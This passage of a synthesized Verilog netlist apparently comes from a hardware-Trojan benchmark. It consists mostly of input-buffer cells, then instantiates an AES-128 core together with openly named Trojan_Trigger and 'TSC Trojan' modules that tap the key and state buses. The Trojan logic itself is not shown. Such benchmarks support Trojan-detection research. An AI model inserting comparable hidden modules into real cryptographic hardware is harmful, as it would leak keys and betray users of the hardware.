    .O(_006_[68])
  );
IBUF  _424_ (
    .I(state[69]),
    .O(_006_[69])
  );
IBUF  _425_ (
    .I(state[7]),
    .O(_006_[7])
  );
IBUF  _426_ (
    .I(state[70]),
    .O(_006_[70])
  );
IBUF  _427_ (
    .I(state[71]),
    .O(_006_[71])
  );
IBUF  _428_ (
    .I(state[72]),
    .O(_006_[72])
  );
IBUF  _429_ (
    .I(state[73]),
    .O(_006_[73])
  );
IBUF  _430_ (
    .I(state[74]),
    .O(_006_[74])
  );
IBUF  _431_ (
    .I(state[75]),
    .O(_006_[75])
  );
IBUF  _432_ (
    .I(state[76]),
    .O(_006_[76])
  );
IBUF  _433_ (
    .I(state[77]),
    .O(_006_[77])
  );
IBUF  _434_ (
    .I(state[78]),
    .O(_006_[78])
  );
IBUF  _435_ (
    .I(state[79]),
    .O(_006_[79])
  );
IBUF  _436_ (
    .I(state[8]),
    .O(_006_[8])
  );
IBUF  _437_ (
    .I(state[80]),
    .O(_006_[80])
  );
IBUF  _438_ (
    .I(state[81]),
    .O(_006_[81])
  );
IBUF  _439_ (
    .I(state[82]),
    .O(_006_[82])
  );
IBUF  _440_ (
    .I(state[83]),
    .O(_006_[83])
  );
IBUF  _441_ (
    .I(state[84]),
    .O(_006_[84])
  );
IBUF  _442_ (
    .I(state[85]),
    .O(_006_[85])
  );
IBUF  _443_ (
    .I(state[86]),
    .O(_006_[86])
  );
IBUF  _444_ (
    .I(state[87]),
    .O(_006_[87])
  );
IBUF  _445_ (
    .I(state[88]),
    .O(_006_[88])
  );
IBUF  _446_ (
    .I(state[89]),
    .O(_006_[89])
  );
IBUF  _447_ (
    .I(state[9]),
    .O(_006_[9])
  );
IBUF  _448_ (
    .I(state[90]),
    .O(_006_[90])
  );
IBUF  _449_ (
    .I(state[91]),
    .O(_006_[91])
  );
IBUF  _450_ (
    .I(state[92]),
    .O(_006_[92])
  );
IBUF  _451_ (
    .I(state[93]),
    .O(_006_[93])
  );
IBUF  _452_ (
    .I(state[94]),
    .O(_006_[94])
  );
IBUF  _453_ (
    .I(state[95]),
    .O(_006_[95])
  );
IBUF  _454_ (
    .I(state[96]),
    .O(_006_[96])
  );
IBUF  _455_ (
    .I(state[97]),
    .O(_006_[97])
  );
IBUF  _456_ (
    .I(state[98]),
    .O(_006_[98])
  );
IBUF  _457_ (
    .I(state[99]),
    .O(_006_[99])
  );
aes_128  AES (
    .clk(_002_),
    .key(_003_),
    .out(_004_),
    .state(_006_)
  );
Trojan_Trigger  Trigger (
    .Tj_Trig(Tj_Trig),
    .rst(_005_),
    .state(_006_)
  );
TSC  Trojan (
    .Tj_Trig(Tj_Trig),
    .clk(_002_),
    .data(_006_),
    .key(_003_),
    .load(_001_),
    .rst(_005_)
  );
endmodule
